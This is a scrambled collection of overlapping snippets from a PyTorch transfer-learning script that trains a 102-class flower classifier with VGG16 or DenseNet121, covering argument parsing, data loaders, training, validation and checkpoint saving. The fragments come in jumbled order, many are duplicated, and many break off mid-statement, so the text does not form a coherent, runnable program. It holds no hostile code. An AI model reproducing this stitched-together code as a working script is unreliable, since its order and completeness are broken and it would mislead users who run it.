model.zero_grad() # Forward and backward passes outputs = model.forward(inputs) loss = criterion(outputs,", "} dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid':", "parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models as strings:", "torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'],", "transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets = { 'train':", "labels) in enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss +=", "epochs = 1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs,", "= 0 total = 0 with torch.no_grad(): model.eval() for data in test_loader: images,", "0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,", "+= (predicted == labels).sum().item() accuracy = round(100 * correct / total, 2) print('Accuracy:", "torch.nn.functional as F import torch.utils.data from torchvision import datasets, models, transforms from collections", "for all three in the same order. Returns all six datasets and loaders,", "datasets and loaders, in the same order. ''' train_dir = data_dir + '/train'", "not available; using CPU') else: print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024,", "equality = (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model,", "= load() model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model =", "optimizer) def validation(model, valid_loader, criterion, device): ''' Validation function for our model. Returns", "1) total += labels.size(0) correct += (predicted == labels).sum().item() accuracy = round(100 *", "is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural Network. Default is 1024.')", "order. ''' train_dir = data_dir + '/train' valid_dir = data_dir + '/valid' test_dir", "Units for our Neural Network. Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for", "load(data_dir='./flowers'): ''' Loads data for train, test and validation. Also loads dataloaders for", "test_loader, device): ''' Prints validation accuracy of model ''' correct = 0 total", "# Functions def arg_parser(): ''' Takes in command-line arguments and parses them for", "epochs else: print('No epochs specified. Fallback to default epochs: 1') epochs = 1", "valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss:", "= model(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted", "device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available; using", "epochs = epochs else: epochs = 1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier,", "help='Use GPU (Y for Yes; N for No). Default is Y.') args =", "in enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss += criterion(output,", "criterion, device): ''' Validation function for our model. Returns validation loss and accuracy.", "type=float, help='Learning Rate for our Neural Network. Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden", "train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture", "loss.backward() optimizer.step() running_loss += loss.item() if steps % print_every == 0: model.eval() with", "value for our Dropout layers. Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural", "parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use", "for our model. Returns validation loss and accuracy. ''' valid_loss = 0 valid_acc", "[0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test':", "GPU: 1') gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data =", "our model. Returns validation loss and accuracy. ''' valid_loss = 0 valid_acc =", "for {} epochs'.format(epochs)) for e in range(epochs): running_loss = 0 for ii, (inputs,", "data_dir + '/train' valid_dir = data_dir + '/valid' test_dir = data_dir + '/test'", "given. Fallback to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture input_", "to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088", "else: print('Incorrect Value for GPU entered.') print('Fallback to default GPU: 1') device =", "= torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted == labels).sum().item() accuracy =", "from torchvision.models as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for", "validation accuracy of model ''' correct = 0 total = 0 with torch.no_grad():", "model.forward(inputs) valid_loss += criterion(output, labels).item() ps = torch.exp(output) equality = (labels.data == ps.max(dim=1)[1])", "from torch import nn from torch import optim import torch.nn.functional as F import", "densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural Network. Default is 0.001.')", "32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets", "else: print('No number of hidden inputs specified. Fallback to default inputs: 1024') hidden", "supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural Network. Default is 0.001.') parser.add_argument('--hidden',", "= { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders", "\\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 if hidden: hidden", "''' correct = 0 total = 0 with torch.no_grad(): model.eval() for data in", "input: Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given. Fallback to default", "functions. ''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models", "else: epochs = 1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs':", "print('No input given. Fallback to default GPU: 1') gpu='Y' device = set_device(gpu) train_loader,", "= nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)),", "# Main def main(): args = arg_parser() if args.gpu: gpu=args.gpu else: print('No input", "hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu, dropout, hidden, learning_rate. Returns a torch", "model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to", "learning_rate specified. Fallback to default learning_rate: 0.001') learning_rate = 0.001 if dropout: dropout", "training complete!') return(model) def validate(model, test_loader, device): ''' Prints validation accuracy of model", "= data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456,", "print('CUDA not available; using CPU') else: print('Using GPU') elif gpu=='N': device = 'cpu'", "GPU entered.') print('Fallback to default GPU: 1') device = torch.device('cuda' if torch.cuda.is_available() else", "device): ''' Validation function for our model. Returns validation loss and accuracy. '''", "optimizer.step() running_loss += loss.item() if steps % print_every == 0: model.eval() with torch.no_grad():", "of our Python functions. ''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and", "total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture): ''' Saves the model", "given. Fallback to default GPU: 1') gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader,", "32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid'])", "ii, (inputs, labels) in enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device) output = model.forward(inputs)", "= inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss += criterion(output, labels).item() ps = torch.exp(output)", "0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training. Default is 1.') parser.add_argument('--gpu', type=str,", "'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved", "def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu, dropout, hidden,", "lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader, criterion, device): ''' Validation function for", "0 valid_acc = 0 for ii, (inputs, labels) in enumerate(valid_loader): inputs, labels =", "type=int, help='Epochs for Neural Network training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU", "datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32,", "% print_every == 0: model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion,", "('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion =", "help='Epochs for Neural Network training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y", "{} epochs'.format(epochs)) for e in range(epochs): running_loss = 0 for ii, (inputs, labels)", "''' Prints validation accuracy of model ''' correct = 0 total = 0", "the given path. ''' model.class_to_idx = train_data.class_to_idx if epochs: epochs = epochs else:", "Network. Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural Network. Default", "build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer,", "torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) # Main def main(): args = arg_parser()", "= nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader, criterion,", "test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture = args.architecture) if __name__ == '__main__': main()", "0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(),", "= images.to(device), labels.to(device) outputs = model(images) _, predicted = torch.max(outputs.data, 1) total +=", "'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = {", "Also handles most edge-cases. Returns the device variable to be used later. '''", "3) print('Epoch: {}/{} :: Training Loss: {} :: Validation Loss: {} :: Validation", "criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains our Neural Network model", "= 0 model.train() print('Model training complete!') return(model) def validate(model, test_loader, device): ''' Prints", "architecture input_ = 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture input_", "three in the same order. Returns all six datasets and loaders, in the", "Model for {} epochs'.format(epochs)) for e in range(epochs): running_loss = 0 for ii,", "''' Takes in command-line arguments and parses them for usage of our Python", "Trains our Neural Network model ''' steps = 0 if epochs: epochs =", "model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every),", "= round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{}", "using CPU') else: print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): '''", "build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu, dropout, hidden, learning_rate.", "else: print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given. Fallback", "Fallback to default learning_rate: 0.001') learning_rate = 0.001 if dropout: dropout = dropout", "os import argparse # Functions def arg_parser(): ''' Takes in command-line arguments and", "optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader, criterion, device): '''", "+= 1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward passes", "= False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2',", "0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test':", "default GPU: 1') gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data", "valid_loader, criterion, device): ''' Validation function for our model. Returns validation loss and", "Main def main(): args = arg_parser() if args.gpu: gpu=args.gpu else: print('No input given.", "steps = 0 if epochs: epochs = epochs else: print('No epochs specified. Fallback", "architecture given. Fallback to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture", "round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} ::", "elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture input_ = 1024 else: print('Invalid", "correct += (predicted == labels).sum().item() accuracy = round(100 * correct / total, 2)", "'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485,", "valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc =", "labels).item() ps = torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return", "dataloaders for all three in the same order. Returns all six datasets and", "specified. Fallback to default learning_rate: 0.001') learning_rate = 0.001 if dropout: dropout =", "N for No). Default is Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'): '''", "print('CUDA not available; using CPU') else: print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05,", "is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training. Default is 1.') parser.add_argument('--gpu',", "def main(): args = arg_parser() if args.gpu: gpu=args.gpu else: print('No input given. Fallback", "Returns the device variable to be used later. ''' if gpu=='Y': device =", "import optim import torch.nn.functional as F import torch.utils.data from torchvision import datasets, models,", "labels = data images, labels = images.to(device), labels.to(device) outputs = model(images) _, predicted", "''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models as", "parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural Network. Default is 0.001.') parser.add_argument('--hidden', type=int,", "Fallback to default epochs: 1') epochs = 1 print('Training Model for {} epochs'.format(epochs))", "torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'],", "architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs)", "is Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data for train,", "= 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture input_ = 1024", "and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural Network. Default is", "import os import argparse # Functions def arg_parser(): ''' Takes in command-line arguments", "and parses them for usage of our Python functions. ''' parser = argparse.ArgumentParser(description='ImageClassifier", "as pd import numpy as np import torch from torch import nn from", "nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader, criterion, device):", "transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True),", "test_loader: images, labels = data images, labels = images.to(device), labels.to(device) outputs = model(images)", "hidden inputs specified. Fallback to default inputs: 1024') hidden = 1024 if learning_rate:", "epochs, architecture): ''' Saves the model to the given path. ''' model.class_to_idx =", "training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch:", "default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 if", "as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural", "print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture,", "# Imports import pandas as pd import numpy as np import torch from", "validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture = args.architecture) if __name__ == '__main__':", "= torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc", "= {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid':", "model.classifier = classifier model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion,", "0 with torch.no_grad(): model.eval() for data in test_loader: images, labels = data images,", "Takes in command-line arguments and parses them for usage of our Python functions.", "training_loss, valid_loss, valid_acc)) running_loss = 0 model.train() print('Model training complete!') return(model) def validate(model,", "for our Neural Network. Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our", "print('No number of hidden inputs specified. Fallback to default inputs: 1024') hidden =", "dropout = dropout else: print('No dropout specified. Fallback to default dropout: 0.05') dropout", "else: print('No architecture given. Fallback to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name", "labels = inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss += criterion(output, labels).item() ps =", "our Python functions. ''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model", "default inputs: 1024') hidden = 1024 if learning_rate: learning_rate = learning_rate else: print('No", "'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) # Main def main(): args =", "data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406],", "'cpu') if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') return(device) def", "type=str, help='Architecture and model from torchvision.models as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate',", "dropout: dropout = dropout else: print('No dropout specified. Fallback to default dropout: 0.05')", "train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains our Neural Network", "if epochs: epochs = epochs else: print('No epochs specified. Fallback to default epochs:", "nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ]))", "epochs = epochs else: print('No epochs specified. Fallback to default epochs: 1') epochs", "return(model) def validate(model, test_loader, device): ''' Prints validation accuracy of model ''' correct", "if learning_rate: learning_rate = learning_rate else: print('No learning_rate specified. Fallback to default learning_rate:", "data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]),", "import argparse # Functions def arg_parser(): ''' Takes in command-line arguments and parses", "= round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss: {}", "available; using CPU') else: print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001):", "0.001 if dropout: dropout = dropout else: print('No dropout specified. Fallback to default", "''' train_dir = data_dir + '/train' valid_dir = data_dir + '/valid' test_dir =", "return(model, criterion, optimizer) def validation(model, valid_loader, criterion, device): ''' Validation function for our", "GPU: 1') device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not", "parameter. Also handles most edge-cases. Returns the device variable to be used later.", "device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') return(device) def build(device, architecture='vgg16',", "{'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth'", "= build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion,", "else: print('Using GPU') elif gpu=='N': device = 'cpu' print('Using CPU') else: print('Incorrect Value", "validation(model, valid_loader, criterion, device): ''' Validation function for our model. Returns validation loss", "torchvision import datasets, models, transforms from collections import OrderedDict import os import argparse", "''' Sets the device based on the parameter. Also handles most edge-cases. Returns", "device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') elif gpu=='N': device =", "edge-cases. Returns the device variable to be used later. ''' if gpu=='Y': device", "shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the", "= criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if steps % print_every ==", "print('Using GPU') elif gpu=='N': device = 'cpu' print('Using CPU') else: print('Incorrect Value for", "input_ = 25088 if hidden: hidden = hidden else: print('No number of hidden", "torch import optim import torch.nn.functional as F import torch.utils.data from torchvision import datasets,", "* correct / total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture): '''", "dropout else: print('No dropout specified. Fallback to default dropout: 0.05') dropout = 0.05", "inputs, labels = inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss += criterion(output, labels).item() ps", "learning_rate: learning_rate = learning_rate else: print('No learning_rate specified. Fallback to default learning_rate: 0.001')", "models.vgg16(pretrained=True) model.name = architecture input_ = 25088 if hidden: hidden = hidden else:", "same order. ''' train_dir = data_dir + '/train' valid_dir = data_dir + '/valid'", "print('No dropout specified. Fallback to default dropout: 0.05') dropout = 0.05 for parameter", "print('Training Model for {} epochs'.format(epochs)) for e in range(epochs): running_loss = 0 for", "to default dropout: 0.05') dropout = 0.05 for parameter in model.parameters(): parameter.requires_grad =", "Value for GPU entered.') print('Fallback to default GPU: 1') device = torch.device('cuda' if", "= 1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture':", "optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture = args.architecture) if __name__", "gpu=='N': device = 'cpu' print('Using CPU') else: print('Incorrect Value for GPU entered.') print('Fallback", "= parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data for train, test and validation.", "to default learning_rate: 0.001') learning_rate = 0.001 if dropout: dropout = dropout else:", "valid_loader, train_data, test_data, valid_data = load() model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout,", "Returns a torch model. ''' if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name", "ps = torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss,", "train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs,", "architecture, gpu, dropout, hidden, learning_rate. Returns a torch model. ''' if architecture: if", "if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088", "pd import numpy as np import torch from torch import nn from torch", "else: print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in", "= dropout else: print('No dropout specified. Fallback to default dropout: 0.05') dropout =", "transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485,", "arg_parser() if args.gpu: gpu=args.gpu else: print('No input given. Fallback to default GPU: 1')", "later. ''' if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu':", "accuracy. ''' valid_loss = 0 valid_acc = 0 for ii, (inputs, labels) in", "= 0 for ii, (inputs, labels) in enumerate(train_loader): steps += 1 inputs, labels", "passes outputs = model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item()", "in command-line arguments and parses them for usage of our Python functions. '''", "all three in the same order. Returns all six datasets and loaders, in", "input_ = 1024 else: print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No", "training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes; N for", "1') device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available;", "= optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader, criterion, device): ''' Validation", "function for our model. Returns validation loss and accuracy. ''' valid_loss = 0", "valid_loss = 0 valid_acc = 0 for ii, (inputs, labels) in enumerate(valid_loader): inputs,", "args = arg_parser() if args.gpu: gpu=args.gpu else: print('No input given. Fallback to default", "('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1))", "command-line arguments and parses them for usage of our Python functions. ''' parser", "if steps % print_every == 0: model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model,", "} return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the device", "[0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) }", ".format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss = 0 model.train() print('Model training complete!') return(model)", "datasets, models, transforms from collections import OrderedDict import os import argparse # Functions", "nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate)", "model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model,", "and model from torchvision.models as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning", "if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not", "if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 elif architecture=='densenet121':", "return valid_loss, valid_acc def train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): '''", "as F import torch.utils.data from torchvision import datasets, models, transforms from collections import", "= validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3)", "valid_loss += criterion(output, labels).item() ps = torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc", "0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets =", "print('Using CPU') else: print('Incorrect Value for GPU entered.') print('Fallback to default GPU: 1')", "enumerate(train_loader): steps += 1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward and", "= 1024 else: print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture", "Forward and backward passes outputs = model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step()", "'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file))", "steps += 1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward", "architecture input_ = 25088 if hidden: hidden = hidden else: print('No number of", "be used later. ''' if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')", "architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 elif", "default learning_rate: 0.001') learning_rate = 0.001 if dropout: dropout = dropout else: print('No", 